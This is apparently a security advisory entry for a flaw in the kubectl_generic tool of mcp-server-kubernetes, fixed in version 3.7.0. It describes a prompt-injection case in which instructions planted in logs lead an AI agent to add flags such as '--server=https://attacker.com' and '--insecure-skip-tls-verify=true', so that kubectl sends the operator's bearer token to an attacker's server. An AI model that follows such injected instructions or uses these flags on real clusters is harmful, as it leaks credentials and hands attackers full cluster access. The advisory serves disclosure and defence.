GHSA-6mx4-4h42-r8vh: MCP Server Kubernetes: kubectl-generic flag injection enables Kubernetes bearer token exfiltration
mediumvulnerabilityLLM-Specific
security
Summary
The `kubectl_generic` tool in `mcp-server-kubernetes` accepts any kubectl flags without validation, allowing an attacker to inject flags like `--server=https://attacker.com` and `--insecure-skip-tls-verify=true`. When a privileged operator uses the MCP server and an AI agent follows injected instructions in logs, kubectl sends the operator's Kubernetes bearer token (authentication credential) to the attacker's server, which can then be replayed to gain full cluster access.
Vulnerability Details
EPSS (30-day exploit probability)
EPSS: 0.0%
Patch Available
Yes
Disclosure Date
June 5, 2026
Classification
Attack Type
Prompt InjectionSupply Chain
Attack SophisticationModerate
Impact (CIA+S)
confidentiality
Affected Vendors
Anthropic
Affected Packages
mcp-server-kubernetes@<= 3.6.2 (fixed: 3.7.0)
Related Issues
Monthly digest — independent AI security research
Original source: https://github.com/advisories/GHSA-6mx4-4h42-r8vh
First tracked: June 5, 2026 at 02:00 PM
Classified by LLM (prompt v3) · confidence: 95%